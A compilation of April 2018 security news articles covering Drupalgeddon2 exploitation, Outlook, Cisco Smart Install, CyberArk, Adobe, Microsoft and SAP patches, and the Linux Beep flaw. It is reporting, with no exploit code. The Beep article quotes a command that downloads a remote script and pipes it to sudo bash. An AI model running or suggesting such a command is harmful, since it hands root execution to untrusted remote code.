“By exploiting this vulnerability an attacker would have been able to carry out a full site takeover of any Drupal customer.”

After the publication of the report. the expert Vitalii Rudnykh shared a working Proof-Of-Concept for Drupalgeddon2 on GitHub for “educational or information purposes.”

Immediately after the disclosure of the PoC, security experts started observing bad actors attempting to exploit the flaw.

The experts at the Sucuri firm confirmed that they are seeing attempts for the Drupal RCE (CVE-2018-7600) in the wild, below the Tweet published by Sucuri founder and CTO Daniel Cid.

Daniel Cid

@danielcid
We are seeing attempts for the Drupal RCE (CVE-2018-7600) in the wild now: https://www.drupal.org/sa-core-2018-002 …

Expect that to grow with the new exploits being shared publicly:https://github.com/a2u/CVE-2018-7600/blob/master/exploit.py …

Also, good read from from CheckPoint explaining it:https://research.checkpoint.com/uncovering-drupalgeddon-2/ …

Patch now!

12:15 AM - Apr 13, 2018

Uncovering Drupalgeddon 2 - Check Point Research
By Eyal Shalev, Rotem Reiss and Eran Vaknin Abstract Two weeks ago, a highly critical (21/25 NIST rank) vulnerability, nicknamed Drupalgeddon 2 (SA-CORE-2018-002 / CVE-2018-7600), was disclosed by...

research.checkpoint.com
39
40 people are talking about this
Twitter Ads info and privacy
According to the researchers at the SANS Institute, threat actors are currently scanning the web for vulnerable servers using simple commands such as echo, phpinfo, whoami, and touch.

“The payload pings a host where the hostname of the target is prefixed to the hostname to be pinged. This is sort of interesting as mu6fea[.]ceye[.]io is a wildcard DNS entry, and *.mu6fea[.]ceye[.]io appears to resolve to 118.192.48.48 right now. So the detection of who is “pinging” is made most likely via DNS.” states the SANS.

Experts have no doubts, hackers will start soon exploiting the flaw to hack vulnerable websites in the wild.


Hackers Start Exploiting Drupalgeddon2 Vulnerability
14.4.2018 securityweek
Vulnerebility

Attempts to exploit a recently patched vulnerability in the Drupal content management system (CMS) were spotted by researchers shortly after someone published a proof-of-concept (PoC) exploit.

In late March, Drupal developers rolled out an update to address CVE-2018-7600, a highly critical remote code execution flaw that can be exploited to take full control of a site. The security hole affects Drupal 6, 7 and 8, and patches have been released for each of the impacted versions – Drupal 6 is no longer supported since February 2016, but a patch has still been created.

Drupalgeddon2

Experts warned at the time that exploitation of the vulnerability, dubbed Drupalgeddon2, was imminent. However, it took roughly two weeks for a proof-of-concept (PoC) exploit to become publicly available.

Researchers at Check Point and Drupal experts at Dofinity worked together to uncover the vulnerability and on Thursday they published a detailed technical analysis.

“In brief, Drupal had insufficient input sanitation on Form API (FAPI) AJAX requests,” they explained in a post on the Check Point blog. “As a result, this enabled an attacker to potentially inject a malicious payload into the internal form structure. This would have caused Drupal to execute it without user authentication. By exploiting this vulnerability an attacker would have been able to carry out a full site takeover of any Drupal customer.”

Shortly after Check Point and Dofinity published their analysis, Vitalii Rudnykh published a PoC on GitHub for “educational or information purposes,” which others confirmed to be functional. Once the PoC was made public, Sucuri and the SANS Internet Storm Center started seeing attempts to exploit Drupalgeddon2.

At the time of writing, there are no reports of websites being hacked via CVE-2018-7600. Attackers are apparently scanning the web in search for vulnerable servers. The payloads spotted by SANS researchers use simple commands such as echo, phpinfo, whoami and touch.

Web security services, including Cloudflare's Web Application Firewall (WAF), should be able to block attacks exploiting the vulnerability.

“The exploit attempts are currently arriving at a pretty brisk pace,” said ISC handler Kevin Liston. Sucuri founder and CTO Daniel Cid also warned that the number of exploit attempts is expected to grow.

The original Drupalgeddon vulnerability, disclosed in October 2014, was first exploited just 7 hours after a patch was released and it was leveraged by cybercriminals for at least another two years.


'Spectrum' Service Extends Cloudflare Protection Beyond Web Servers
14.4.2018 securityweek
Vulnerebility

Cloudflare on Thursday announced the availability of a new service that extends the company’s protection capabilities to gaming, remote access, email, IoT and other types of systems.

The new product, named Spectrum, allows enterprises to leverage Cloudflare not only to protect their websites, but also any other system that is exposed to the Internet through an open TCP port, including SSH, SFTP, SMTP and custom protocols.

Spectrum includes protection against distributed denial-of-service (DDoS) attacks, which will likely attract the interest of gaming companies. Hypixel, which runs the largest Minecraft server and one of the first victims of the massive Mirai botnet attacks, has already started using Spectrum.Cloudflare launches Spectrum

Banking services provider Montecito Bank & Trust has also started using Spectrum to protect its email and SSH servers.

The new service also integrates with Cloudflare’s IP Firewall, allowing users to choose which connections can pass through to their servers and which should be blocked.

Cloudflare launches Spectrum

Spectrum also allows organizations to terminate TLS at the edge of the Cloudflare infrastructure, which can speed up performance.

“We think the most interesting outcome is that just by adding support for TLS in the client, Cloudflare can now add encryption to legacy protocols and services that don’t traditionally support encrypted transit,” explained Cloudflare’s Dani Grant.

Spectrum is currently only available to enterprises due to the fact that TCP relies on each service having its own IP address for identification purposes. IPv4 addresses are hard to come by and expensive, but the company says it’s actively thinking about how it can offer Spectrum to everyone, including by offering only IPv6 addresses to non-enterprise customers, or asking users to pay for IPv4 addresses.

The company has released a video showing how easy it is to add TCP applications to Spectrum in the Cloudflare dashboard, and a blog post explaining exactly how Spectrum works and the challenges of implementing such a service.

Cloudflare also announced this year the launch of a remote access service designed to replace corporate VPNs, and a free DNS service.


Illumio, Qualys Partner on Vulnerability-based Micro-Segmentation
14.4.2018 securityweek
Vulnerebility

Vulnerability management has two major components: discovering vulnerabilities, and mitigating those vulnerabilities. The first component is pointless without the second component. So, for example, Equifax, WannaCry, NotPetya, and many other breaches -- if not most breaches -- are down to a failure to patch, which is really a failure in vulnerability management.

In these examples the vulnerabilities were known, but not mitigated. Patches were available, but not implemented. It's a hugely complicated problem, because although there are vulnerability management platforms, immediate patching is not always possible (for fear of breaking essential applications); and the ramifications of not patching are not easily understood.

"Everyone does vulnerability management," says Illumio's VP of product management, Matthew Glenn. "It's like motherhood and apple pie -- it's just something you have to do." So, companies have a vulnerability team that scans for and locates vulnerabilities, and then that team tries to persuade the app team to patch the vulnerable application.

"This creates a really interesting tension," he continued, "because app teams really just want to make sure that their apps are running without interruption, while patching can create an unknown outcome. It takes time to get a patch installed. So, if they can't install a patch, they look for some form of compensating control."

Micro-segmentation firm Illumio is now seeking to provide that compensating control to this problem via a relationship with the Qualys vulnerability platform. Illumio already has a dependency mapping capability, called Illumination, as part of its Adaptive Security Platform. This shows dependencies and connections between different applications, even when spread across multiple data centers or in the cloud. It highlights whether connections are within policy, allowing companies to micro-segment the infrastructure to increase security.

network dependency maps.

"What we've now added," explains Glenn, "is the ability to import vulnerability scans from Qualys. This creates a new capability we call vulnerability maps." The vulnerability map is color-coded from the Qualys data and overlaid on the app dependency map: green is low and informational; orange is medium risk; and red is critical.

But this doesn't just show the location of the vulnerabilities -- added to the app dependency map it shows the potential ramifications of that vulnerability across the network through open ports and connecting and communicating links, and with the internet. These are the paths that an intruder, having exploited a vulnerability, would seek out for lateral movement through the network.

"What we do," said Glenn, "is combine the Qualys vulnerability data with our application dependency map to let organizations do something they've never been able to do before -- which is just literally see the data paths within and between data centers in the way a bad actor does, and show the exposure of the vulnerabilities on the hosts. We think this is a transformational moment because traditionally the vulnerability management team and the application team are two different groups. This new approach allows them to collaborate together to do something they haven't been able to do before: to see how exposed those vulnerabilities actually are."

Patching individual vulnerabilities may not be immediately possible -- but micro-segmenting the network to isolate the vulnerability as far as possible, is possible. Operators can locate the vulnerability, can see the level of criticality, can see and measure paths open to an attacker (something Illumio calls the 'East-West' exposure score), and can automatically impose mitigating micro-segmentation controls that limit exposure without breaking any apps.

“Digital transformation leads to an explosion of connected environments where perimeter protection is no longer enough. The focus now needs to shift from securing network perimeters to safeguarding data spread across applications, systems, devices, and the cloud,” says Philippe Courtot, CEO and Chairman of Qualys. “The new Illumio integration with Qualys helps enterprises get visibility across hybrid environments and implement appropriate controls to protect assets from cyber threats, whether on premises or in the cloud.”

If a company has a high value application with a vulnerability that cannot be patched, but the vulnerability management team knows there is a 0-day exploit in the wild (all information courtesy of Qualys), the question becomes, what can be done? "You can use micro-segmentation," suggests Glenn, "as a way of creating compensating controls to reduce the exposure of the vulnerability. Arbitrarily blocking vulnerabilities is the pathway to breaking applications. So, we've created a very nuanced approach, where we look at the connectivity paths that allow us to reduce the exposure without breaking the applications.

"We use the connectivity paths to fine-tune a micro-segmentation policy. It can automatically block or constrain applications. Blocking only ever happens automatically if the ven [Illumio's virtual enforcement nodes, installed on each host] has never seen traffic on the pathway -- perhaps a developer left a port open months ago. Constraining, however, can use micro-segmentation to reduce the effect of a vulnerability without breaking the application. The visible map allows the operator to see the effect of any new policy rules that, once written, will be pushed out to effect the micro-segmentation."

“Vulnerability management is an invaluable tool in every security team’s arsenal. With our Qualys Cloud Platform integration, organizations can see a map of how active, exposed vulnerabilities can potentially be exploited by a bad actor,” adds Andrew Rubin, CEO and co-founder of Illumio. “By adding vulnerability maps to our Adaptive Security Platform, security teams can see potential attack paths in real time and immediately implement micro-segmentation to prevent the spread of breaches.”

Sunnyvale, Ca-based Illumio raised $100 million Series C financing in April 2015, followed by a further $125 million Series D funding in June 2017.


LimeSurvey Flaws Expose Web Servers to Attacks
13.4.2018 securityweek
Vulnerebility

A couple of vulnerabilities affecting the popular online survey tool LimeSurvey can be exploited by remote attackers to execute malicious code and take control of web servers with little or no user interaction, researchers warn.

LimeSurvey is a free and open source tool that allows users to create online surveys. The software is downloaded roughly 10,000 times every month and is used by individuals and organizations worldwide.

Researchers at RIPS Technologies discovered two potentially serious flaws in LimeSurvey version 2.72.3.

One of the security holes is a persistent cross-site scripting (XSS) issue that affects the “resume later” feature, which allows users to save partially completed surveys and reload them by providing an email address and password.

The email address field was not properly sanitized, allowing an attacker to inject malicious JavaScript code that would get executed when a user visited a specific web page – the attacker can lure a victim to this web page – or when an administrator viewed the partially saved data in the control panel.

The attacker can exploit the vulnerability to perform various actions on behalf of the authenticated user.

The second vulnerability is an arbitrary file write issue that allows an attacker to upload a malicious file by abusing LimeSurvey’s template editor. Exploiting this flaw requires authentication, but that can be achieved using the XSS bug.

According to RIPS researchers, the vulnerabilities can be chained into a single payload that gives the attacker control over the targeted web server.

“The vulnerability chaining [...] yields a single final exploit which would add malicious JavaScript code to the admin panel through the Continue Later functionality of a public survey,” explained RIPS researcher Robin Peraglie. “As soon as the JavaScript payload is executed in the administrator context it can exploit the arbitrary file write vulnerability to give the adversary persistent shell access to the operating system remotely to maximize impact.”

LimeSurvey developers patched the vulnerabilities in November 2017 with the release of version 2.72.4, just two days after the issues were reported. However, RIPS has advised users to update LimeSurvey to the latest release of version 3.


CVE-2018-0950 flaw in Microsoft Outlook could be exploited to steal Windows Passwords
13.4.2018 securityaffairs
Vulnerebility

An 18-month-old CVE-2018-0950 vulnerability in Microsoft Outlook could be exploited by hackers to steal the Windows Password.
Almost 18 months ago, the security researcher Will Dormann of the CERT Coordination Center (CERT/CC) has found a severe vulnerability in Microsoft Outlook (CVE-2018-0950), time is passed but Microsoft partially addressed it with the last Patch Tuesday updates.
The flaw in Microsoft Outlook ties the way Microsoft Outlook renders remotely-hosted OLE content when an RTF (Rich Text Format) an email is previewed and automatically initiates SMB connections.

The CVE-2018-0950 flaw could be exploited by attackers to steal sensitive data such as Windows login credentials by tricking victims into preview an email with Microsoft Outlook,
“Outlook blocks remote web content due to the privacy risk of web bugs. But with a rich text email, the OLE object is loaded with no user interaction. Let’s look at the traffic in Wireshark to see what exactly is being leaked as the result of this automatic remote object loading.” wrote Dormann.

The vulnerability, discovered by Will Dormann of the CERT Coordination Center (CERT/CC), resides in the way Microsoft Outlook renders remotely-hosted OLE content when an RTF (Rich Text Format) email message is previewed and automatically initiates SMB connections.

The attack scenario sees a remote attacker exploiting the vulnerability by sending an RTF email to the victim, the malicious message contains an image file (OLE object) that is loaded from a remote SMB server under the control of the attackers.
“Here we can see than an SMB connection is being automatically negotiated. The only action that triggers this negotiation is Outlook previewing an email that is sent to it.” The following screenshot shows that IP address, domain name, Username, hostname, SMB session key are being leaked.

CVE-2018-0950

“Microsoft Outlook will automatically retrieve remote OLE content when an RTF email is previewed. When remote OLE content is hosted on a SMB/CIFS server, the Windows client system will attempt to authenticate with the server using single sign-on (SSO).” states the CERT. “This may leak the user’s IP address, domain name, user name, host name, and password hash. If the user’s password is not complex enough, then an attacker may be able to crack the password in a short amount of time.”

Microsoft Outlook automatically renders OLE content, this means that it will initiate an automatic authentication with the attacker’s controlled remote server over SMB protocol using single sign-on (SSO). This will cause the leak of NTLMv2 hashed version of the password that could be cracked by the attacks with commercial tools and services.

Microsoft attempted to address the flaw in the last security updates, but it only successfully fixed automatically SMB connections when it previews RTF emails, any other SMB attack is still feasible.

“It is important to realize that even with this patch, a user is still a single click away from falling victim to the types of attacks described above,” Dormann added. “For example, if an email message has a UNC-style link that begins with “\\”, clicking the link initiates an SMB connection to the specified server.”

SMB-hack-outlook
Summarizing, the installation of the Microsoft update for CVE-2018-0950 will not fully protect users from the exploitation of this issue.

Users are advised to apply the following mitigations:

Install the Microsoft update for CVE-2018-0950.
Block ports 445/tcp, 137/tcp, 139/tcp, along with 137/udp and 139/udp used for SMB sessions.
Block NT LAN Manager (NTLM) Single Sign-on (SSO) authentication.
Always strong passwords.
Never click on suspicious links embedded in emails.


Here's how hackers are targeting Cisco Network Switches in Russia and Iran
12.4.2018 thehachernews
Vulnerebility 

Since last week, a new hacking group, calling itself 'JHT,' hijacked a significant number of Cisco devices belonging to organizations in Russia and Iran, and left a message that reads—"Do not mess with our elections" with an American flag (in ASCII art).
MJ Azari Jahromi, Iranian Communication and Information Technology Minister, said the campaign impacted approximately 3,500 network switches in Iran, though a majority of them were already restored.
The hacking group is reportedly targeting vulnerable installations of Cisco Smart Install Client, a legacy plug-and-play utility designed to help administrators configure and deploy Cisco equipments remotely, which is enabled by default on Cisco IOS and IOS XE switches and runs over TCP port 4786.
Some researchers believe the attack involves a recently disclosed remote code execution vulnerability (CVE-2018-0171) in Cisco Smart Install Client that could allow attackers to take full control of the network equipment.
However, since the hack apparently resets the targeted devices, making them unavailable, Cisco believes hackers have been merely misusing the Smart Install protocol itself to overwrite the device configuration, instead of exploiting a vulnerability.
"The Cisco Smart Install protocol can be abused to modify the TFTP server setting, exfiltrate configuration files via TFTP, modify the configuration file, replace the IOS image, and set up accounts, allowing for the execution of IOS commands," the company explains.
Chinese security firm Qihoo 360's Netlab also confirms that that hacking campaign launched by JHT group doesn’t involve the recently disclosed code execution vulnerability; instead, the attack is caused due to the lack of any authentication in the Cisco smart install protocol, reported in March last year.

According to Internet scanning engine Shodan, more than 165,000 systems are still exposed on the Internet running Cisco Smart Install Client over TCP port 4786.
Since Smart Install Client has been designed to allow remote management on Cisco switches, system administrators need to enable it but should limit its access using Interface access control lists (ACLs).
Administrators who do not use the Cisco Smart Install feature at all should disable it entirely with the configuration command—"no vstack."
Although recent attacks have nothing to do with CVE-2018-0171, admins are still highly recommended to install patches to address the vulnerability, as with technical details and proof-of-concept (PoC) already available on the Internet, hackers could easily launch their next attack leveraging this flaw.


Critical Code Execution Flaw Found in CyberArk Enterprise Password Vault
12.4.2018 thehachernews
Vulnerebility

A critical remote code execution vulnerability has been discovered in CyberArk Enterprise Password Vault application that could allow an attacker to gain unauthorized access to the system with the privileges of the web application.
Enterprise password manager (EPV) solutions help organizations securely manage their sensitive passwords, controlling privileged accounts passwords across a wide range of client/server and mainframe operating systems, switches, databases, and keep them safe from external attackers, as well as malicious insiders.
Discovered by German cybersecurity firm RedTeam Pentesting GmbH, the vulnerability affects one of such Enterprise Password Vault apps designed by CyberArk—a password management and security tool that manages sensitive passwords and controls privileged accounts.
The vulnerability (CVE-2018-9843) resides in CyberArk Password Vault Web Access, a .NET web application created by the company to help its customers access their accounts remotely.
The flaw is due to the way web server unsafely handle deserialization operations, which could allow attackers to execute code on the server processing the deserialized data.
According to the researchers, when a user logs in into his account, the application uses REST API to send an authentication request to the server, which includes an authorization header containing a serialized .NET object encoded in base64.
This serialized .NET object holds the information about a user's session, but researchers found that the "integrity of the serialized data is not protected."
Since the server does not verify the integrity of the serialized data and unsafely handles the deserialization operations, attackers can merely manipulate authentication tokens to inject their malicious code into the authorization header, gaining "unauthenticated, remote code execution on the web server."
Researchers have also released a full proof-of-concept code to demonstrate the vulnerability using ysoserial.net, an open source tool for generating payloads for .NET applications performing unsafe deserialization of objects.
The technical details of the vulnerability and exploit code came only after RedTeam responsibly reported the vulnerability to CyberArk and the company rolled out patched versions of the CyberArk Password Vault Web Access.
Enterprises using CyberArk Password Vault Web Access are highly recommended to upgrade their software to version 9.9.5, 9.10 or 10.2.
In case you cannot immediately upgrade your software, the possible workaround to mitigate this vulnerability is disabling any access to the API at the route / PasswordVault / WebServices.


SAP Patches Critical Flaws in Business Client
12.4.2018 securityweek 
Vulnerebility

SAP this week released its April 2018 set of security patches, which include fixes for critical vulnerabilities in web browser controls delivered with SAP Business Client.

A total of 10 Security Notes were included in this month’s Security Patch Day, along with 2 updates to previously released security notes. One of the Notes was rated Hot News, 4 were High Priority, and 7 had a Medium Priority rating, SAP’s advisory reads.

The most important of the Security Notes addresses multiple vulnerabilities in the web browser controls used to display pages in SAP Business Client 6.5 PL5. The vulnerabilities impact browser controls for Microsoft's Internet Explorer (IE) and the open source Chromium.

“The latter has been determined to show multiple weaknesses like memory corruption, information disclosure and more. Although the SAP note does not explicitly mention it, similar security flaws can be expected for IE,” Onapsis, a firm that specializes in securing Oracle and SAP products, reveals.

Users who follow the Windows update process should be safe from the vulnerabilities in the IE browser control, given that the control “hooks into libraries that are patched alongside other Windows updates,” Onapsis explains.

Delivered with the SAP Business Client, the Chromium browser control requires the newly released security note to patch.

One of the High Priority Security Notes in SAP’s April 2018 patches addresses a denial of service (DoS) in SAP Business One (CVSS score of 7.5), but the bug actually exists in Apache (used as a HTTP server in the Business One service layer). By exploiting the bug, an attacker could terminate the vulnerable application’s process.

SAP also addressed an improper session management issue in SAP Business Objects (CVSS score of 7.3). Tracked as CVE-2018-2408, the vulnerability results in existing user sessions remaining active even after a password change.

This month, SAP also released an update to a Note addressing a code injection vulnerability in SAP Visual Composer (CVSS score of 7.4). The flaw allowed an attacker to inject code into the back-end application by sending a specially crafted HTTP GET request to the Visual Composer. SAP fixed that, but researchers discovered that the bug could be triggered using POST requests as well.

Additionally, SAP released Update 1 to Security Note 2376081. Also featuring a CVSS score of 7.4, the Note patches bugs in VCFRAMEWORK and VC70RUNTIME.

One other update included in this month’s Patch Day is Security Note 2201710. Rated Medium Priority and featuring a CVSS score of 5.4, it is an update to a note released with the September 2015 Patch Day: Fixing Logjam and Alternative chains certificate forgery vulnerabilities in multiple SAP products. 18 SAP products are impacted.

The remaining Security Notes released this month address bugs in SAP CP Connectivity Service and Cloud Connector, Disclosure Management, Solution Manager Incident Management Workcenter, Business One Browser Access, Crystal Reports Server OEM Edition, and Control Center and Cockpit Framework.

SAP also released 4 Security Notes after the second Tuesday of the previous month and before the second Tuesday of this month, for a total of 16 Security Notes, according to ERPscan, another firm specialized in securing Oracle and SAP products.

The resolved issues include 5 implementation flaws, 2 directory traversal, 2 cross-site scripting (XSS), 2 code injection, buffer overflow, missing authorization check, denial of service, XML external entity (XXE), and clickjacking.


AMD, Microsoft Release Spectre Patches

11.4.2018 securityweek  Vulnerebility

AMD and Microsoft on Tuesday released microcode and operating system updates that should protect users against Spectre attacks.

When the existence of the Spectre and Meltdown vulnerabilities was brought to light, AMD downplayed their impact on its processors, but the company did promise to release microcode updates and add protections against these types of attacks to its future CPUs.

Meltdown attacks rely on a vulnerability identified as CVE-2017-5754, while Spectre attacks are possible due to CVE-2017-5753 (Variant 1) and CVE-2017-5715 (Variant 2). In the case of AMD, the company’s processors are not affected by Meltdown thanks to their design, and Spectre Variant 1 can be addressed with software patches – just like in the case of Intel processors.AMD releases microcode updates to patch Spectre

Mitigating Spectre Variant 2 attacks requires a combination of microcode and operating system updates, which AMD and Microsoft released on Tuesday.

“While we believe it is difficult to exploit Variant 2 on AMD processors, we actively worked with our customers and partners to deploy the above described combination of operating system patches and microcode updates for AMD processors to further mitigate the risk,” said Mark Papermaster, senior vice president and chief technology officer at AMD.

Microcode updates, which users can obtain from device manufacturers via BIOS updates, have been developed for AMD processors dating back to the first Bulldozer core products launched in 2011. The chip giant has published a document detailing the indirect branch control feature designed to mitigate indirect branch target injection attacks such as Spectre Variant 2.

Windows 10 updates released by Microsoft on Tuesday include Spectre Variant 2 mitigations for AMD devices. The patches are also expected to become available for Windows Server 2016 after they are validated and tested.

Microsoft started releasing Spectre patches for devices with AMD processors shortly after the CPU vulnerabilities were disclosed in early January. However, the company was forced to temporarily suspend the updates due to instability issues.

As for Linux devices, AMD said mitigations for Spectre Variant 2 were made available earlier this year.

While AMD processors appear to be less impacted compared to Intel products, lawsuits have still been filed against the company over the Spectre vulnerabilities.


Adobe Patches Vulnerabilities in Six Products
11.4.2018 securityweek 
Vulnerebility

Adobe has patched a total of 19 vulnerabilities across six of its products, including Flash Player, Experience Manager, InDesign CC, Digital Editions, ColdFusion and the PhoneGap Push plugin.

A total of six flaws rated critical and important have been fixed in Flash Player with the release of version 29.0.0.140, including use-after-free, out-of-bounds read, out-of-bounds write and heap overflow bugs that can lead to remote code execution and information disclosure.

Four of the vulnerabilities have been reported to Adobe by researchers at Google Project Zero. While some of the issues have been rated critical, Adobe says there is no evidence of malicious exploitation and the company does not believe exploits are imminent.

The number of vulnerabilities fixed in Flash Player has dropped significantly since Adobe announced its intention to kill the application in 2020. However, malicious actors have not given up trying to find security holes they can exploit. In February, Adobe issued an emergency update to address a zero-day used by North Korean hackers.

The April Patch Tuesday updates from Adobe also cover Experience Manager, in which the company patched three moderate and important cross-site scripting (XSS) flaws.

An update has also been released for Adobe InDesign CC to fix a critical memory corruption that allows arbitrary code execution via specially crafted .inx files, and an untrusted search path issue in the installer that can lead to privilege escalation.

The latest version of Adobe Digital Editions resolves an out-of-bounds read vulnerability and a stack overflow, both of which can result in disclosure of information.

ColdFusion version 11 and the 2016 release have also received security updates. A total of five flaws have been patched, including local privilege escalation, remote code execution and information disclosure issues.

Finally, the Adobe PhoneGap Push plugin has been updated to address a same-origin method execution bug that exposes apps built with the affected plugin to JavaScript code execution.


Microsoft Patches Two Dozen Critical Flaws in Windows, Browsers
11.4.2018 securityweek 
Vulnerebility

Microsoft’s Patch Tuesday updates for April 2018 resolve a total of 66 vulnerabilities, including nearly two dozen critical issues affecting Windows and the company’s web browsers.

None of the flaws patched this month appear to have been exploited in the wild, but one privilege escalation vulnerability discovered by a Microsoft researcher in SharePoint has been disclosed to the public.

A majority of the critical flaws affecting Internet Explorer and Edge are related to scripting engines and they allow remote code execution.

A remote code execution flaw affecting the VBScript engine has also been rated critical. The security hole can be exploited via malicious websites or documents. Trend Micro’s Zero Day Initiative (ZDI) noted that while this is similar to browser bugs, the attack surface is broader due to the possibility of exploitation using Office documents.

Several critical vulnerabilities that allow remote code execution have also been found in graphics components, specifically font libraries and how they handle embedded fonts.

“Since there are many ways to view fonts – web browsing, documents, attachments – it’s a broad attack surface and attractive to attackers. Given the history of malicious fonts, these patches should be high on your test and deployment list. This is also a good time to remind you to not do day-to-day tasks as an administrator,” ZDI’s Dustin Childs explained in a blog post.

Microsoft also informed customers that its Wireless Keyboard 850 is affected by a security feature bypass vulnerability that can be exploited to simulate keystrokes and send malicious commands to the targeted computer. An attacker could also exploit this flaw to read keystrokes, which can include sensitive information, such as passwords.

“[The vulnerability] could allow an attacker to reuse an AES encryption key to send keystrokes to other keyboard devices or to read keystrokes sent by other keyboards for the affected devices. An attacker would first have to extract the AES encryption key from the affected keyboard device. The attacker would also need to maintain physical proximity – within wireless range – of the devices for the duration of the attack,” Microsoft said.

Adobe’s Patch Tuesday updates address a total of 19 vulnerabilities across six products. Six flaws have been fixed in Flash Player, which Microsoft also resolved in Windows.

Earlier this month, Microsoft announced the release of an update for its Malware Protection Engine to patch a critical vulnerability that could have been exploited to take control of a system by placing a malicious file in a location where it would be scanned.


Adobe April Security Bulletin Tuesday fixed 4 critical flaws in Flash
11.4.2018 securityaffairs
Vulnerebility

Adobe April Security Bulletin Tuesday is out, the company has addressed four critical vulnerabilities in the Flash Player.
Adobe April Security Bulletin has addressed a total of 19 vulnerabilities in its products, including Flash Player, Experience Manager, InDesign CC, Digital Editions, ColdFusion and the PhoneGap Push plugin.

The company has released the Flash Player version 29.0.0.140 that fixed four critical flaws and two issues rated as important.

The flaws addressed with the Adobe April Security Bulletin Tuesday include a use-after-free, out-of-bounds read, out-of-bounds write and heap overflow bugs that could be exploited by remote attackers to execute arbitrary code on the target system and that could lead information disclosure.

“Adobe has released security updates for Adobe Flash Player for Windows, Macintosh, Linux and Chrome OS. These updates address critical vulnerabilities in Adobe Flash Player 29.0.0.113 and earlier versions. Successful exploitation could lead to arbitrary code execution in the context of the current user.” reads the security advisory published by Adobe.

Below the vulnerability details

Vulnerability Category Vulnerability Impact Severity CVE Number
Use-After-Free Remote Code Execution Critical CVE-2018-4932
Out-of-bounds read Information Disclosure Important CVE-2018-4933
Out-of-bounds read Information Disclosure Important CVE-2018-4934
Out-of-bounds write Remote Code Execution Critical CVE-2018-4935
Heap Overflow Information Disclosure Important CVE-2018-4936
Out-of-bounds write Remote Code Execution Critical CVE-2018-4937
Adobe acknowledged Google white hat hackers Mateusz Jurczyk and Natalie Silvanovich of Google Project Zero for reporting the CVE-2018-4936, CVE-2018-4935, CVE-2018-4934, CVE-2018-4937 flaw.

The CVE-2018-4933 vulnerability was reported by willJ of Tencent PC Manager, while the CVE-2018-4932 flaw was reported by Lin Wang of Beihang University.

The good news is that according to Adobe, there is no evidence of malicious exploitation in the wild.

Adobe also addressed three moderate and important cross-site scripting (XSS) flaws in the Experience Manager.

Adobe also fixed a critical memory corruption flaw (CVE-2018-4928) in Adobe InDesign CC that was reported by Honggang Ren of Fortinet’s FortiGuard Labs. Ren discovered a memory corruption flaw that could be exploited for arbitrary code execution.

Adobe also fixed an out-of-bounds read vulnerability and a stack overflow issue in Adobe Digital Editions and five flaws in ColdFusion.

The last issue covered by the company is a same-origin method execution bug in the Adobe PhoneGap Push plugin.


Booby-trapped Office docs build with ThreadKit trigger CVE-2018-4878 flaw
10.4.2018 securityaffairs
Vulnerebility

Microsoft Office documents created with the exploit builder kit dubbed ThreadKit now include the code for CVE-2018-4878 flaw exploitation.
At the end of March, security experts at Proofpoint discovered a Microsoft Office document exploit builder kit dubbed ThreadKit that has been used to spread a variety of malware, including banking Trojans and RATs (i.e. Trickbot, Chthonic, FormBook and Loki Bot).

The exploit kit was first discovered in October 2017, but according to the experts, crooks are using it at least since June 2017.

The ThreadKit builder kit shows similarities to Microsoft Word Intruder (MWI), it was initially being advertised in a forum post as a builder for weaponized decoy documents.

Just after its appearance, documents created with the ThreadKit builder kit have been observed in several campaigns.

Now threat actors are using the ThreadKit builder kit to target the recently patched CVE-2018-4878 Flash vulnerability, experts started observing exploit code samples in the wild a few days ago.

ThreadKit adobe flaws

Adobe addressed the CVE-2018-4878 in February after North Korea’s APT group was spotted exploiting it in targeted attacks.

The vulnerability could be exploited by an attack by tricking victims into opening a document, web page or email containing a specially crafted Flash file.

According to the researcher Simon Choi the Flash Player flaw has been exploited by North Korea since mid-November 2017. The attackers exploited the zero-day vulnerability in attacks aimed at South Korean individuals involved in research activity on North Korea.

Now the exploit was included in the ThreadKit builder, based on Virus Total hashes posted to Pastebin.

The security expert Claes Splett has published a video that shows how to build a CVE-2018-478 exploit in ThreadKit.

Proofpoint experts reported that in the last weeks, the exploit kit included new exploits targeting vulnerabilities such as the CVE-2018-4878 Adobe Flash zero-day and several Microsoft office vulnerabilities (i.e. CVE-2018-0802 and CVE-2017-8570).


Linux open source utility Beep is affected by several vulnerabilitues
10.4.2018 securityaffairs
Vulnerebility

Researchers have discovered several vulnerabilities in the Linux command line tool Beep, some experts suggest to remove the utility from distros.
An unnamed security researcher has found several vulnerabilities in the Linux command line tool Beep, including a severe flaw introduced by a patch for a privilege escalation vulnerability.

Beep is a small open source utility used in the past by Linux developers to produce a beep with a computer’s internal speaker, it allows users to control the pitch, duration, and repetitions of the sound.

The researcher discovered a race condition in the utility that could be exploited by an attacker to escalate privileges to root. Versions through 1.3.4 are affected by the flaw that was tracked as CVE-2018-0492.

Further info on the flaw is available on the website holeybeep.ninja

holey beep

Is your system vulnerable? In order to discover if a system is vulnerable it is possible to run the following command:

curl https://holeybeep.ninja/am_i_vulnerable.sh | sudo bash

A vulnerable machine will beep.

The Holey Beep website also provides a patch, but experts noticed that it actually introduces a potentially more serious vulnerability that could be exploited to execute an arbitrary code on the patched system.

“The patch vulnerability seems more severe to me, as people apply patches all the time (they shouldn’t do it as root, but people are people),” reads a message published by Tony Hoyle on the Debian bug tracker. “It’s concerning that the holeybeep.ninja site exploited an unrelated fault for ‘fun’ without apparently telling anyone.”

Beep is also affected by other issues, including integer overflow vulnerabilities, and a flaw that can reveal information about the file on the system.

Waiting for a code review of the utility, probably it is time to remove the utility from distros because PC speaker doesn’t exist in most modern systems.


Vulnerabilities Found in Linux 'Beep' Tool
9.4.2018 securityweek
Vulnerebility

Several vulnerabilities have been found in the Linux command line tool Beep, including a potentially serious issue introduced by a patch for a privilege escalation flaw.

For well over a decade, Beep has been used by developers on Linux to get a computer’s internal speaker to produce a beep. What makes Beep useful for certain programs is the fact that it allows users to control the pitch, duration and repetitions of the sound. The open source application has not received any updates since 2013.

An unnamed researcher discovered recently that Beep versions through 1.3.4 are affected by a race condition that allows a local attacker to escalate privileges to root.

The security hole has been assigned CVE-2018-0492 and it has been sarcastically described as “the latest breakthrough in the field of acoustic cyber security research.” Someone created a dedicated website for it (holeybeep.ninja), a logo, and named it “Holey Beep.”

The individual or individuals who set up the Holey Beep website have also provided a patch, but someone noticed that this fix actually introduces a potentially more serious vulnerability that allows arbitrary command execution.

